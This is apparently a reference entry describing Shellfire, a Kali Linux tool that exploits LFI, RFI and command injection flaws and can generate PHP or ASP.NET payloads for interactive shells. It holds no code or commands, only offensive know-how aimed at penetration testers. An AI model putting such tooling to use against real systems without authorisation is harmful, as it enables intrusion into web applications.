Shellfire

Shellfire is a specialized tool in Kali Linux for exploiting Local File Inclusion (LFI), Remote File Inclusion (RFI), and command injection vulnerabilities. These are common web application flaws that can lead to remote code execution, making Shellfire valuable for penetration testers and security researchers targeting insecure file handling or input sanitization.

The tool offers an interactive shell environment tailored for these specific vulnerability types, streamlining the process of chaining exploits into practical access. It supports configuration loading and payload generation for different environments like PHP and ASP.NET, enhancing its utility in diverse web application scenarios.

Use cases include red team engagements where LFI/RFI paths are identified via reconnaissance, or command injection points discovered through fuzzing. Shellfire reduces the manual effort required to weaponize these findings into functional shells.

Shellfire operates as an interactive exploitation shell that interfaces with vulnerable endpoints supporting LFI, RFI, or command injection. It sends crafted payloads to include remote files or inject commands, then interprets responses to build a command execution loop. The --generate option outputs standalone payloads for PHP or ASP.NET, which can be uploaded or triggered via the vulnerability. Debugging mode reveals the underlying queries sent to the target, while named configs allow pre-defined setups for repeated exploitation sessions.